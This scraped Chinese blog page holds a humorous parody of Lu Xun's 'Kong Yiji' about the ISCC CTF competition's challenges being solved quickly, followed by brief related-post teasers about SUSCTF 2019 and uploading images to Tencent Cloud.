ISCC一上线,所有上网的人便都看着他笑,有的叫道,“ISCC,你又处新题了!”他不回答,对柜里说,“加两道web题,再来一个Reverse。”便排出九文大钱。他们又故意的高声嚷道,“你出的题又被秒了!”ISCC 睁大眼睛说,“你怎么这样凭空污人清白……”“什么清白?我前天亲眼见你PWN题目一上线,就被网友吊着打。”ISCC便涨红了脸,额上的青筋条条绽出,争辩道,“PWN题怎么秒杀……PWN!……程序猿的事,能算秒杀么?”接连便是难懂的话,什么“Double Free”,什么“Use after Free”

			
		

	





	

		

			

				
					
SUSCTF 2019

				
			

			

				

					皮三宝好菜的博客
				

				

					04-14
					
					1080
					
				

			

		

		

			
				
SUSCTF 2019
http://www.psbazx.com/2019/04/14/susctf-2019/
懒得搬过来了。。。



			
		

	





	

		

			

				
					
上传图片,将图片保存在腾讯云(2种方式)

				
			

			

				

					weixin_30700099的博客
				

				

					05-16
					
					1704
					
				

			

		

		

			
				
sdk下载地址:https://cloud.tencent.com/document/product/436/6274
文件结构:
1.手动上传图片,传到腾讯云
img.php

1 <!--enctype属性标识提交表单时要用哪种内容类型,我们这是上传文件(二进制数据),使用multipart/form-data-->
2 <form action="up...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值